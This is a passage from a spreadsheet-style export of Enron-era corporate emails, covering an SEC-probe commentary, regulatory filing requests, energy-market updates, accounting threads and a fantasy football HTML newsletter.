McGraw-Hill Companies. Regulators say shaky bank loans hit a record $193 bi=_x000D_
llion by early October._x000D_
_x000D_
If Enron has insured any of the bad debt, it might have to take charges for=_x000D_
 losses if they exceed the premiums it has been getting. With all that has =_x000D_
been happening in recent weeks, that's the last thing it needs.=20_x000D_
_x000D_
By Heather Timmons in New York_x000D_
_x000D_
_x000D_
NOVEMBER 12, 2001=20_x000D_
_x000D_
FINANCE=20_x000D_
By Mike McNamee_x000D_
_x000D_
Commentary: Enron's Clout Won't Sway the SEC=20_x000D_
http://www.businessweek.com/premium/content/01_46/b3757082.htm_x000D_
For Securities &amp; Exchange Commission Chairman Harvey L. Pitt, the SEC's inv=_x000D_
estigation into Enron Corp. (ENE) could hardly have come at a worse time. T=_x000D_
he future of Pitt's ambitious agenda of reforms in securities regulation co=_x000D_
uld depend on how well he handles this case._x000D_
_x000D_
Enron's political clout and close ties to President George W. Bush create r=_x000D_
eal risks for the SEC. Enron CEO Kenneth L. Lay is a longtime Bush backer, =_x000D_
and the company was the biggest corporate contributor to the President's ca=_x000D_
mpaign. A Bush appointee, Pitt is attempting a delicate balancing act. He h=_x000D_
as made it clear he wants to speed up the SEC's enforcement, in part by rew=_x000D_
arding companies that cooperate with probes. But he insists the SEC will st=_x000D_
ill come down hard on true corporate miscreants--and knows that any signs o=_x000D_
f let-up could jeopardize the rest of his reform agenda._x000D_
_x000D_
Enter the Enron probe. The fine shadings of securities enforcement--where m=_x000D_
ost cases are settled by negotiated penalties, not court-imposed fines--oft=_x000D_
en make it hard for outsiders to tell whether the SEC is being tough or len=_x000D_
ient. But Pitt must go out of his way to make it clear that the Enron case =_x000D_
is handled by the book--getting the same strict scrutiny from the SEC as an=_x000D_
y other, less connected company._x000D_
_x000D_
For now, top SEC aides say that's happening. The SEC Enforcement Div. in Wa=_x000D_
shington is looking into whether Enron adequately disclosed to shareholders=_x000D_
 the risks of its complex deals with Andrew S. Fastow, the company's former=_x000D_
 chief financial officer. Agency insiders say Pitt and his fellow commissio=_x000D_
ners will be briefed on the case as it proceeds. But they insist Pitt hasn'=_x000D_
t heard from the White House or Enron's other political allies._x000D_
_x000D_
TOP LOBBYIST. Enron's connections are numerous. Besides Lay's links to Bush=_x000D_
, an Enron director, Wendy Lee Gramm, is the wife of Texas Senator Phil Gra=_x000D_
mm, top Republican on the Senate Banking Committee. And Enron spreads its l=_x000D_
obbying budget--$2.13 million in 2000--across both parties. Just this year =_x000D_
it hired four lobbying firms with Democratic roots. Enron says it lobbies h=_x000D_
eavily because it operates in regulated industries. It notes that electric =_x000D_
utilities outspend it 35 to 1._x000D_
_x000D_
On Oct. 31, a special committee of Enron's board hired William R. McLucas, =_x000D_
former SEC enforcement director, to represent it. McLucas should know that =_x000D_
any attempt to muscle the stock cops is likely to backfire. Pitt, who joine=_x000D_
d the SEC out of law school in 1968, "remembers how the [Nixon-era] SEC tai=_x000D_
nted itself by turning a blind eye to [fugitive financier] Robert Vesco," s=_x000D_
ays an agency veteran. Pitt has too much riding on the Enron probe to let i=_x000D_
ts connections sway his judgment.=20_x000D_
_x000D_
McNamee covers finance in Washington._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 09:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alfred.pennisi@enron.com'})</t>
  </si>
  <si>
    <t>Re: Regulatory Notifications</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sue, _x000D_
_x000D_
I have no problem dealing with the CFTC/NYMEX/NFA. I need to have information _x000D_
from Enron on the following issues pursuant to CFTC Reg 1.14 and 1.15:_x000D_
_x000D_
Organizational Chart, which includes the MAP's _x000D_
Risk Management Policies and proceedures_x000D_
Financial Statements for certain of the MAP's and a description of the MAP's _x000D_
duties and functions to the FCM _x000D_
_x000D_
This needs to be done by November of this year. _x000D_
_x000D_
This information is due within 60 days from the last quarter in which the _x000D_
change took place. Change took place in the middle of July, end of the _x000D_
quarter is September '00.  Therefore  the information is due by the middle of _x000D_
November'00._x000D_
_x000D_
If anyone has any questions please call me at 212 715 5845._x000D_
_x000D_
Alfred Pennisi_x000D_
MG London Inc._x000D_
520 Madison Avenue_x000D_
28th Floor_x000D_
New York, NY 10022_x000D_
Tel: 212.715.5845_x000D_
E-mail: alfred.pennisi@mglondon.com _x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 10:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'mark.palmer@enron.com', 'karen.denne@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>customer update</t>
  </si>
  <si>
    <t xml:space="preserve">UC/CSU (31 campuses in CA):_x000D_
Savings communicated to UC/CSU, _x000D_
April 1999 - March 2000:_x000D_
UC -    $1.72_x000D_
CSU - $3.17_x000D_
I'm waiting for a draft release back from them._x000D_
_x000D_
Tricon Global (approx 1400 restaurants in CA):_x000D_
Joe Main, energy manager from Tricon will call tomorrow_x000D_
with the name and phone number of the lobbiest they_x000D_
have hired to attend commission meeting.  He is _x000D_
working with their PR vp to determine how far they_x000D_
can go publically.  _x000D_
_x000D_
_x000D_
In case you missed:_x000D_
_x000D_
_x000D_
DISTRIBUTION: Business Editors/Energy Writers _x000D_
_x000D_
LENGTH: 821 words _x000D_
_x000D_
HEADLINE: SDG&amp;E Seeks $16 Million for Energy-Efficiency Assistance for _x000D_
Customers _x000D_
_x000D_
DATELINE: SAN DIEGO, July 24, 2000 _x000D_
_x000D_
BODY: _x000D_
 _x000D_
To provide its customers with additional assistance this summer and next, San _x000D_
Diego Gas &amp; Electric (SDG&amp;E) has requested from the California Public _x000D_
Utilities Commission (CPUC) $16 million over the next two years to increase _x000D_
funding for energy-efficiency programs._x000D_
"Our customers need assistance today in lowering their energy costs and _x000D_
today's proposal will bring an additional $16 million funding to encourage _x000D_
energy conservation in our region," said Edwin A. Guiles, president of SDG&amp;E. _x000D_
"This money can be used to help replace old, inefficient appliances, such as _x000D_
air conditioners and refrigerators, which will result in reduced electric _x000D_
bills and less strain on our state's electric-supply system."_x000D_
Of the $16 million, SDG&amp;E would allocate an additional $4.3 million _x000D_
exclusively for low-income energy-efficiency assistance programs over the _x000D_
next two years.  _x000D_
Under the proposal filed Friday, the low-income assistance funds will be used _x000D_
to expand existing programs, such as refrigerator and evaporative cooler _x000D_
replacements, while introducing new programs, including room air-conditioner _x000D_
replacements and evaporative cooler maintenance and repair. The program also _x000D_
includes incentives for landlords to replace refrigerators and air _x000D_
conditioners in rental units._x000D_
The rest of the money would go into other energy-efficiency programs to _x000D_
provide incentives for removal and recycling of operating second _x000D_
refrigerators; refrigerator and room air-conditioner replacement; replacement _x000D_
of inefficient pool pumps; and increased incentives for a variety of programs _x000D_
to benefit small businesses._x000D_
Funds for these additional incentives come from 1999 programs that did not _x000D_
draw as much customer participation as expected. For instance, large _x000D_
customers requested less than half the amount budgeted for a program designed _x000D_
to provide energy-efficiency incentives to them._x000D_
Details on the programs are still being developed, but they should be in _x000D_
place in early September. The CPUC is expected to act on SDG&amp;E's filing in _x000D_
late August._x000D_
In California's newly created competitive energy marketplace, SDG&amp;E is a _x000D_
delivery-service provider. For those customers who have not chosen another _x000D_
energy service provider, SDG&amp;E buys electricity from the California Power _x000D_
Exchange (Cal-PX) and passes that cost directly onto its customers, with no _x000D_
mark-up. The price of power is now a function of supply and demand in the _x000D_
open market. Over the last several weeks, SDG&amp;E customers have seen their _x000D_
electric bills rise sharply due to the significant increase in commodity _x000D_
costs as a result of power demand in California and surrounding states._x000D_
Friday's proposal marks the latest in a series of actions SDG&amp;E has taken _x000D_
recently to help customers grapple with high electric prices._x000D_
On July 20, SDG&amp;E and the Cal-PX proposed a new market-based power bidding _x000D_
solution to the CPUC that would allow SDG&amp;E to procure power for customers _x000D_
with less price volatility over the next five to nine months._x000D_
On July 14, SDG&amp;E filed a request with the CPUC to accelerate the return of _x000D_
$100 million in customer money from a CPUC-controlled account. The CPUC's _x000D_
approval of SDG&amp;E's request would release of money acquired from _x000D_
power-generating benefits of San Onofre Nuclear Generating Station and other _x000D_
assets would decrease the August and September residential electric bills by _x000D_
$34, or $17 a month._x000D_
That proposal, combined with the deregulation-dividend checks most SDG&amp;E _x000D_
customers will receive next month, will result in a total of about $500 _x000D_
million benefit to them in August and September -- nearly$300 for the typical _x000D_
residential customer -- helping to ease cash-flow problems from higher _x000D_
electricity prices._x000D_
The company is actively promoting a level-pay program to all customers, which _x000D_
enables them to even out their bill payments over the course of the year, so _x000D_
they can manage better against their monthly household budget. Those _x000D_
customers participating in the plan will see bills this summer that are _x000D_
comparable to last summer's bills._x000D_
SDG&amp;E also has increased communications to both residential and business _x000D_
customers regarding the changes in the energy marketplace, available _x000D_
energy-efficiency funding and conservation tips for reducing electric bills._x000D_
Information about these programs is available by calling 1-800-411-SDGE._x000D_
San Diego Gas &amp; Electric is a public utility that provides service to 3 _x000D_
million consumers through 1.2 million electric meters and 740,000 natural gas _x000D_
meters in San Diego and southern Orange counties. SDG&amp;E is a subsidiary of _x000D_
Sempra Energy (NYSE:SRE), a Fortune 500 energy services holding company based _x000D_
in San Diego, with 12,000 employees, revenues of nearly $5.5 billion and more _x000D_
than 9 million customers in the United States, Europe, Canada, Mexico and _x000D_
South America.   _x000D_
CONTACT: San Diego Gas &amp; Electric_x000D_
Ed Van Herik, 877/866-2066  _x000D_
URL: http://www.businesswire.com _x000D_
_x000D_
LANGUAGE: ENGLISH _x000D_
_x000D_
LOAD-DATE: July 25, 2000 </t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'drhunt@watervalley.net'})</t>
  </si>
  <si>
    <t>FW: Clarksdale gas</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 06/06/2001 12:19 _x000D_
PM ---------------------------_x000D_
From: Reagan Rorschach/ENRON@enronXgate on 06/06/2001 11:58 AM_x000D_
To: "Marvin Carraway (E-mail)" &lt;mcarraway@watervalley.net&gt;@SMTP@enronXgate, _x000D_
"Marvin Carraway (E-mail 2)" &lt;cpuadmin@clarksdale.com&gt;@SMTP@enronXgate_x000D_
cc: Kay Mann/Corp/Enron@Enron _x000D_
_x000D_
Subject: FW: Clarksdale gas_x000D_
_x000D_
_x000D_
_x000D_
Reagan C. Rorschach_x000D_
Enron North America_x000D_
1400 Smith Street_x000D_
Houston, Texas 77002_x000D_
713.345.3363_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Wednesday, June 06, 2001 10:49 AM_x000D_
To: Rorschach, Reagan; Kroll, Heather; Fairley, David; Miller, Jeffrey; _x000D_
Coulter, Kayne_x000D_
Cc: Dickson, Stacy; Hodge, Jeffrey; Perlingiere, Debra_x000D_
Subject: Clarksdale gas_x000D_
_x000D_
Attached is the master gas agreement, ready for  Clarksdale's review._x000D_
_x000D_
We haven't had any feedback from Yazoo City.  When can we expect their _x000D_
feedback?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 09:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>2/26/01 Checkout</t>
  </si>
  <si>
    <t xml:space="preserve">BLOOMBERG_x000D_
No Errors_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PREBON WEST_x000D_
Diana Scholtes_x000D_
I am missing the following deal:_x000D_
Enron buys Mirant 25 mw of COB for 2/28 only at $195.00_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
AMEREX WEST_x000D_
No Errors_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 Jan 2001 03:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: index</t>
  </si>
  <si>
    <t>It's still a bit of a mystery. Our tech guy suggests that Doug try to send a_x000D_
test email to tradersnewsindexes@ipgdirect.com to see if an error message_x000D_
comes back to him. I know he is probably not there now, but I hope things_x000D_
work tonight when he sends._x000D_
_x000D_
-----Original Message-----_x000D_
From: Tim Kilian [mailto:tim.kilian@ipgdirect.com]_x000D_
Sent: Monday, January 15, 2001 11:16 AM_x000D_
To: ellen.clardy@ipgdirect.com; Greg Baber_x000D_
Subject: RE: index_x000D_
_x000D_
Well, if the e-mail address "tradersnewsindexes@ipgdirect.com" is correct,_x000D_
then no._x000D_
_x000D_
have the guy try sending an e-mail to that address now._x000D_
_x000D_
Does he get anything back, like an error message?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Ellen Clardy [mailto:ellen.clardy@ipgdirect.com]_x000D_
Sent: Monday, January 15, 2001 11:41 AM_x000D_
To: Tim Kilian; Greg Baber_x000D_
Subject: FW: index_x000D_
_x000D_
_x000D_
Can ya'll tell anything from the below? He thinks we are not getting our_x000D_
trades because of a problem on our end._x000D_
_x000D_
-----Original Message-----_x000D_
From: Don.Baughman@enron.com [mailto:Don.Baughman@enron.com]_x000D_
Sent: Monday, January 15, 2001 10:35 AM_x000D_
To: bobette.riner@ipgdirect.com_x000D_
Cc: ellen.clardy@ipgdirect.com_x000D_
Subject: index_x000D_
_x000D_
Bobette_x000D_
_x000D_
I think y'all might want to check your e-mail server.  It looks to me that_x000D_
my night guys have been e-mailing our contribution to your index._x000D_
_x000D_
Give me a call or e-mail me with any questions._x000D_
_x000D_
_x000D_
Don Baughman_x000D_
Enron Power Marketing, Inc._x000D_
_x000D_
PS  What happened to supper last week?_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Don Baughman/HOU/ECT on 01/15/2001_x000D_
10:25 AM ---------------------------_x000D_
_x000D_
_x000D_
Doug Miller@ENRON_x000D_
01/15/2001 12:10 AM_x000D_
_x000D_
To:   tradersnewsindexes@ipgdirect.com, Kayne Coulter/HOU/ECT@ECT, Don_x000D_
      Baughman/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  index_x000D_
_x000D_
(See attached file: 1-12-01 index prices.xls)</t>
  </si>
  <si>
    <t>Thu, 18 Apr 2002 08:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jay.godfrey@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'bo.thisted@enron.com', 'kurt.anderson@enron.com', 'russell.leach@enron.com', 'mark.fisher@enron.com', 'hollis.kimbrough@enron.com', 'george.griese@enron.com'})</t>
  </si>
  <si>
    <t>I have taken your data and tried to do some reconcilliation w/o the linear _x000D_
assumption._x000D_
_x000D_
Where am I making an error?_x000D_
_x000D_
_x000D_
_x000D_
JFG</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 02:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Meeting times confusion</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure anyone told you about this - can you make it on Friday? _x000D_
---------------------- Forwarded by Mark Taylor/HOU/ECT on 03/01/2000 10:29 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
David Forster_x000D_
03/01/2000 09:30 AM_x000D_
To: Jay Webb/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Michael _x000D_
Guadarrama/HOU/ECT@ECT, Jarod Jenson/HOU/ECT@ECT, Michael _x000D_
Belmont/HOU/ECT@ECT, Kevin Montagne/HOU/ECT@ECT, Awais Omar/LON/ECT@ECT, Paul _x000D_
Goddard/LON/ECT@ECT, Marcello Romano/LON/ECT@ECT, Mark Dilworth/LON/ECT@ECT, _x000D_
Amita Gosalia/LON/ECT@ECT, Sheri Thomas/HOU/ECT@ECT, David _x000D_
Forster/LON/ECT@ECT, Rahil Jafry/LON/ECT@ECT, Bob Shults/HOU/ECT@ECT, Dave _x000D_
Samuels/LON/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT_x000D_
cc: Mary Weatherstone/HOU/ECT@ECT _x000D_
Subject: Meeting times confusion_x000D_
_x000D_
_x000D_
There has been some confusion as to the schedule for Thursday and Friday._x000D_
_x000D_
Thursday is intended to be used to review presentations and concepts and _x000D_
generally prepare for the larger Friday meeting. As of yet, we have not _x000D_
scheduled any formal meeting times on Thursday._x000D_
_x000D_
Friday is the "official" presentation day. Although the core group can expect _x000D_
to be offsite for the entire day, other non-EnronOnlinians will only be there _x000D_
from 10 am to 12 pm. These two hours will contain the most critical phase 2 _x000D_
information and discussions and will follow this agenda (incorporating _x000D_
various presentations/parts of presentations as decided on Thursday):_x000D_
_x000D_
 1.  Phase 1.1+  Changes to the current system based on trader and customer _x000D_
feedback and issues._x000D_
 2. Phase 2_x000D_
 (i)  Technical_x000D_
 (ii)  Content &amp; Community _x000D_
_x000D_
Dave_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 06:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ISO Motion for Issuance of Refund (ISO Report on Unjust Prices)</t>
  </si>
  <si>
    <t xml:space="preserve">All:_x000D_
_x000D_
A couple of interested points from the CAISO report, in addition to the good _x000D_
points raised by Sue Mara:_x000D_
_x000D_
During December and January, California relied on imports as much as it _x000D_
relied upon California non-utility-owned generation (p. 18).  Assuming a 70% _x000D_
capacity factor, the ISO said that in-state nonutility gen (i.e., Duke, _x000D_
Reliant, AES, Dynegy) is about 2,000 MW and the imports were about the same _x000D_
over the 55 day period analyzed._x000D_
_x000D_
There is no mention anywhere in the report regarding the level of scarcity in _x000D_
the state--nothing on reserve margins or outages.  Thus, there are huge holes _x000D_
in the analysis w.r.t. the claim that prices were unjust and unreasonable._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'rod.nelson@enron.com', 'jeff.nogid@enron.com', 'sara.shackleton@enron.com', 'jim.armogida@enron.com', 'rex.rogers@enron.com'})</t>
  </si>
  <si>
    <t>Procedure memo for equity trades</t>
  </si>
  <si>
    <t xml:space="preserve">All -_x000D_
I put together a first draft of a procedure memo for executing equity _x000D_
derivatives on Enron common stock.  Please review this, and give me any _x000D_
comments you might have.  I would appreciate it if I could have comments back _x000D_
from you by Friday morning so that we can have a working document as soon as _x000D_
possible.  Thanks in advance for your help._x000D_
_x000D_
CF_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Oct 2001 12:42:37 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'d..winfree@enron.com'})</t>
  </si>
  <si>
    <t>FW: TGLO Status</t>
  </si>
  <si>
    <t xml:space="preserve">OW, _x000D_
_x000D_
What do you think about the orig deduct?  How do we usually handle orig on something like this?_x000D_
_x000D_
D_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	East, Laynie  _x000D_
Sent:	Tuesday, October 30, 2001 10:19 AM_x000D_
To:	Coffey Jr., Jim; Parker, Megan; Boyt, Eric; Farmer, Daren J._x000D_
Cc:	Bryan, Gary; Pond, Jim; Helton, Susan; Roberts, Linda_x000D_
Subject:	RE: TGLO Status_x000D_
_x000D_
Cost centers 11814 and 27117 are rolling to Texas Gas Trading._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Coffey Jr., Jim  _x000D_
Sent:	Tuesday, October 30, 2001 10:05 AM_x000D_
To:	Parker, Megan; Boyt, Eric; Farmer, Daren J._x000D_
Cc:	Bryan, Gary; Pond, Jim; Helton, Susan; East, Laynie; Roberts, Linda_x000D_
Subject:	RE: TGLO Status_x000D_
_x000D_
Megan_x000D_
_x000D_
As I mentioned to you yesterday, it still looks like the volumes for gas delivered to TX GLO do not have Linda Robert's origination fee deducted.  Do we need to execute a PMA with TXGLO to deduct those volumes from the next delievery?_x000D_
_x000D_
Also isn't there an entry that is missing in your file to capture the $ cost of gas for the gas delivered to TXGLO?  Is that being captured in Unify or is it being manually entered by Gas Accounting?_x000D_
_x000D_
Darren_x000D_
Do we need to execute a seperate deal ticket for the origination deduct?_x000D_
_x000D_
Susan/Laynie_x000D_
What busines unit are these cost centers rolling up to (11814 &amp; 27117?)_x000D_
_x000D_
 &lt;&lt; File: TGLO GL Account Detail.xls &gt;&gt; _x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Parker, Megan  _x000D_
Sent:	Tuesday, October 30, 2001 9:06 AM_x000D_
To:	Boyt, Eric_x000D_
Cc:	Newman, Frank G.; Coffey Jr., Jim_x000D_
Subject:	TGLO Status_x000D_
_x000D_
Eric:_x000D_
I reviewed the gas deals on Franks' spreadsheet and they agree with what is in Sitara.  As soon as I have the October gas numbers, I will forward them to you._x000D_
_x000D_
Attached is a spreadsheet of the TGLO deals booked to the GL to help you with our current settlement position.  It is divided by debit/credit entries.  When the sales are booked, a debit hits the customer account to create the open sale to apply the cash to and a credit hits the revenue account (40004000 third party; 40005000 intercompany) for the profit center.  _x000D_
_x000D_
Below is a summary of where we are on the sale dollars to EGM.  I have already sent an email to risk to update the demand fees for the prior months and to book Aug and Sept crude.  I will wait for the go ahead from Frank before I final them to the GL.    Let me know if you have any questions._x000D_
_x000D_
Megan_x000D_
_x000D_
Status of Sales to EGM_x000D_
Cleared invoices		$3,905,963.20_x000D_
Open Invoices		$1,177,587.60_x000D_
To be booked		$3,093,424.22_x000D_
			$8,176,975.55_x000D_
_x000D_
_x000D_
 &lt;&lt; File: TGLO GL Account Detail.xls &gt;&gt; _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 08:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lofeco@ev1.net'})</t>
  </si>
  <si>
    <t>Tana here is a copy  of your invoice._x000D_
?_x000D_
Louis_x000D_
 - invoice611.pdf</t>
  </si>
  <si>
    <t>Fri, 28 Dec 2001 03:15:17 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner.COM E-Reports for Big E '01 12/28/01</t>
  </si>
  <si>
    <t>&lt;!doctype html public "-//w3c//dtd html 4.0 transitional//en"&gt;&lt;html&gt;&lt;HEAD&gt;_x000D_
&lt;!--_x000D_
_x000D_
_x000D_
You are receiving these e-reports because you have signed up for_x000D_
CBS SportsLine.com Fantasy Football.  The default format for these_x000D_
reports is HTML, however if you are reading this text your_x000D_
mail reader is not displaying it as HTML.  To change to_x000D_
text mode, or to customize, reschedule, or turn off these_x000D_
reports please to to the URL below:_x000D_
_x000D_
http://football299.fantasy.sportsline.com/mp/options-ereports?league=bige01&amp;owner=78977.7_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
--&gt;_x000D_
_x000D_
&lt;BASE HREF="http://football299.fantasy.sportsline.com/mp/"&gt;_x000D_
&lt;/HEAD&gt;&lt;BODY TEXT="#00000" ALINK="#ffff00" LINK="#0000ff" VLINK="#0000ff" BGCOLOR=#000099&gt;&lt;CENTER&gt;&lt;TABLE BORDER=0 WIDTH=716 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD&gt;&lt;A HREF=http://www.sportsline.com/links/6/1/163/sffer1225th.cgi&gt;&lt;IMG BORDER=0 SRC=http://images.commissioner.com/images/splash/football/SPLN_mgmt_ereport_header.gif&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;TABLE WIDTH=100% CELLPADDING=10 CELLSPACING=0 BORDER=0 BGCOLOR="#ffffff"&gt;&lt;TR&gt;&lt;TD&gt;Attention Fantasy Members! It's time to get an early start on that New Year's resolution. MVP.com is offering FREE Standard Shipping in our Fitness Shop until 1/17/02. &lt;a href="http://www.sportsline.com/links/6/1/217/sffer1228e.cgi"&gt;Click here to see what we have to offer.&lt;/a&gt;&lt;BR&gt;_x000D_
&lt;BR&gt; _x000D_
Save $.05 a gallon on the gas that keeps your car's engine clean. &lt;a href="http://www.sportsline.com/links/6/1/226/sffer1228c.cgi"&gt;Click here&lt;/a&gt; to apply online.&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;a href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;Win&lt;/a&gt; a VIP Vegas Vacation! OR &lt;a href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;Win&lt;/a&gt; $600 CASH!&lt;/a&gt;&lt;BR&gt;  _x000D_
&lt;BR&gt;_x000D_
_x000D_
	&lt;table width="100%" border=0 cellpadding=3 cellspacing=0&gt;_x000D_
	&lt;TR&gt;&lt;TD bgcolor=black&gt;&lt;FONT FACE="verdana,arial,helvetica" size=1_x000D_
color=white&gt;&lt;B&gt;Brought to you by&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;_x000D_
	&lt;/TABLE&gt;_x000D_
	&lt;TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0"&gt;_x000D_
&lt;TR&gt;_x000D_
&lt;TD colspan=2&gt;_x000D_
&lt;IMG SRC="http://images.commissioner.com/images/ads/ereports/sponsorbar16.gif" USEMAP="#menu.map" width="417" height="25" border="0" ALT="Sponsorship Bar"&gt;&lt;/TD&gt;_x000D_
&lt;/TR&gt;_x000D_
&lt;MAP NAME="menu.map"&gt;_x000D_
&lt;AREA shape="rect" coords="0, 1, 83, 25"_x000D_
href="http://www.sportsline.com/links/6/1/217/sffer1228e.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="83, 1, 166, 25"_x000D_
href="http://www.sportsline.com/links/6/1/226/sffer1228c.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="166, 1, 249, 25"_x000D_
href="http://www.sportsline.com/links/6/1/223/sffer1228v.cgi"&gt;_x000D_
 _x000D_
&lt;AREA shape="rect" coords="249, 1, 332, 25"_x000D_
href="http://www.sportsline.com/links/6/1/163/sffer1228t.cgi"&gt;_x000D_
_x000D_
&lt;AREA shape="rect" coords="332, 1, 415, 25"_x000D_
href="http://www.sportsline.com/links/6/5/3/sffer1227ftl.cgi"&gt;_x000D_
 _x000D_
&lt;/MAP&gt;_x000D_
_x000D_
&lt;/TABLE&gt;_x000D_
&lt;BR&gt;You are receiving these e-reports because you have signed up for_x000D_
    CBS SportsLine.com Fantasy Football.  To customize, reschedule,_x000D_
    or turn off these reports please _x000D_
    &lt;A HREF=http://football299.fantasy.sportsline.com/mp/options-ereports?league=bige01&amp;owner=78977.7&gt;click here&lt;/A&gt;&lt;BR&gt;_x000D_
&lt;BR&gt;_x000D_
&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=1 CELLSPACING=0 BGCOLOR="#000099"&gt;&lt;TR&gt;&lt;TD ALIGN=left&gt;&lt;FONT FACE=arial color=ffffff SIZE=&gt;&lt;B&gt;NFL Reports,&amp;nbsp;Player Update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FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=4&gt;Latest NFL Player News&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1859&amp;"&gt;&lt;B&gt;James Thrash&lt;/B&gt;&lt;/A&gt;, WR PHI - Frank &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Thrash is listed as questionable with an ankle injury, but he is expected to play against the Giants. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=1515&amp;"&gt;&lt;B&gt;Patrick Jeffers&lt;/B&gt;&lt;/A&gt;, WR CAR - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Jeffers may see some increased playing time this week because of Muhsin Muhammad's persistent toe problems. Isaac Byrd, however, still should start in Muhammad's place. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;_x000D_
&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=187389&amp;"&gt;&lt;B&gt;Sebastian Janikowski&lt;/B&gt;&lt;/A&gt;, K OAK - Matty &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Janikowski (groin) has been kicking in practice. He is expected to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=146366&amp;"&gt;&lt;B&gt;Terrence Wilkins&lt;/B&gt;&lt;/A&gt;, WR IND - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;&lt;FONT SIZE=2&gt;Wilkins (hamstring) has returned to practice. He may be able to play this week. &lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;A HREF="http://football299.fantasy.sportsline.com/mp/elink?script=players&amp;league=bige01&amp;owner=78977.7&amp;random=3837&amp;key=12181&amp;"&gt;&lt;B&gt;Stephen Alexander&lt;/B&gt;&lt;/A&gt;, TE WAS - Free Agent &lt;FONT SIZE=1&gt;Updated 12/27/01&lt;/FONT&gt;&lt;BR&gt;&lt;FONT FACE="Arial, Helvetica"&gt;_x000D_
